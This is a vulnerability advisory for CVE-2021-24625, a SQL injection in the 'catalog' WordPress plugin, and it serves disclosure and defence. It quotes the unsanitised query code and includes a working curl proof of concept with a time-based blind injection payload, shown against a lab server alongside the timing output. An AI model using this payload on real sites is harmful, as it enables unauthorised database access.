Plugin Details
Plugin Name: wp-plugin : catalog
Effected Version : 1.7.3 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24625
Identified by : Shreya Pohekar
Disclosure Timeline
-
June 15, 2021: Issue Identified and Disclosed to WPScan
- June 18, 2021 : Plugin Closed
- August 13, 2021 : CVE Assigned
- October 7, 2021 : Public Disclosure
Technical Details
The add category functionality available to Admin role takes in 2 POST parameters parent
and ordering
and inserts it into the save SQL statement without proper sanitization, validation or escaping therefore leads to SQL Injection
Vulnerable Code: Categories.php#L320
320: $rows=$wpdb->get_results('SELECT * FROM '.$wpdb->prefix.'spidercatalog_product_categories WHERE ordering>='.$_POST["orderig"].' AND parent='.$_POST['parent'].' ORDER BY `ordering` ASC ');
PoC Screenshot
Exploit
Request with payload
time curl -i -s -k -X $'POST' \
-H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://172.28.128.50' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36' -H $'Referer: http://172.28.128.50/wp-admin/admin.php?page=Categories_Spider_Catalog&task=add_cat' \
-b $'wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623208844%7CamopuMuV0rpf0x3jlaQP9xCWFDiRBgT6Nvnsq7Wgzvr%7C1f15752437f4fb01cbea5dbc83fbde3b0670101c4f72441c6f64b94a9eb8aca4; __eucookielaw=true; ignored_html_tags=1; manage_settings=1; sk-id=-732593242; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; _ga=GA1.4.436418670.1617784311; giveasap_8=0c552bc06c497f19378400b5a6650520; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=a5ffee9874a5a03b21780ff93ad1ebf1; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623208844%7CamopuMuV0rpf0x3jlaQP9xCWFDiRBgT6Nvnsq7Wgzvr%7C0975adc23f06c07fe046e43fdae16d323fb23dfb16038d69163b29879b0fa4bb; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623036044' \
--data-binary $'name=admin&parent=0-IF(MID(VERSION(),1,1)=8,SLEEP(5),0)\x0d\x0a&uploadded_images_list=&content=test¶m=&ordering=1-IF(MID(VERSION(),1,1)=8,SLEEP(5),0)&published=1&nonce_sp_cat=2a61e6d3fa&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3DCategories_Spider_Catalog%26task%3Dadd_cat' \
$'http://172.28.128.50/wp-admin/admin.php?page=Categories_Spider_Catalog&task=save'
Response with payload
<ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Settings</li><li class="wp-first-item"><a href='options-general.php' class="wp-first-item">General</a></li><li><a href='options-writing.php'>Writing</a></li><li><a href='options-reading.php'>Reading</a></li><li><a href='options-discussion.php'>Discussion</a></li><li><a href='options-media.php'>Media</a></li><li><a href='options-permalink.php'>Permalinks</a></li><li><a href='options-privacy.php'>Privacy</a></li><li><a href='options-general.php?page=ccss'>Chameleon CSS</a></li></ul></li>
<li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
<li class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top toplevel_page_Categories_Spider_Catalog curl -i -s -k -X $'POST' -H $'Upgrade-Insecure-Requests: 1' -H -H -H -H - 0.00s user 0.01s system 0% cpu 1:00.15 total
Request without payload
curl -i -s -k -X $'POST' \
-H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://172.28.128.50' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36' -H $'Referer: http://172.28.128.50/wp-admin/admin.php?page=Categories_Spider_Catalog&task=add_cat' \
-b $'wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623208844%7CamopuMuV0rpf0x3jlaQP9xCWFDiRBgT6Nvnsq7Wgzvr%7C1f15752437f4fb01cbea5dbc83fbde3b0670101c4f72441c6f64b94a9eb8aca4; __eucookielaw=true; ignored_html_tags=1; manage_settings=1; sk-id=-732593242; comment_author_232395f24f6cff47569f2739c21385d6=admin; comment_author_email_232395f24f6cff47569f2739c21385d6=admin%40localhost.com; _ga=GA1.4.436418670.1617784311; giveasap_8=0c552bc06c497f19378400b5a6650520; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=a5ffee9874a5a03b21780ff93ad1ebf1; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623208844%7CamopuMuV0rpf0x3jlaQP9xCWFDiRBgT6Nvnsq7Wgzvr%7C0975adc23f06c07fe046e43fdae16d323fb23dfb16038d69163b29879b0fa4bb; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623036044' \
--data-binary $'name=admin&parent=0\x0d\x0a&uploadded_images_list=&content=test¶m=&ordering=1&published=1&nonce_sp_cat=2a61e6d3fa&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3DCategories_Spider_Catalog%26task%3Dadd_cat' \
$'http://172.28.128.50/wp-admin/admin.php?page=Categories_Spider_Catalog&task=save'
Response without payload
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "default", { "locale_data": { "messages": { "": {} } } } );
</script>
<script src='http://172.28.128.50/wp-includes/js/wp-auth-check.min.js?ver=5.7.2' id='wp-auth-check-js'></script>
<script src='http://172.28.128.50/wp-includes/js/jquery/jquery.color.min.js?ver=2.1.2' id='jquery-color-js'></script>
<div class="clear"></div></div><!-- wpwrap -->
<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
</body>
</html>
curl -i -s -k -X $'POST' -H $'Upgrade-Insecure-Requests: 1' -H -H -H -H - 0.00s user 0.01s system 0% cpu 4.691 total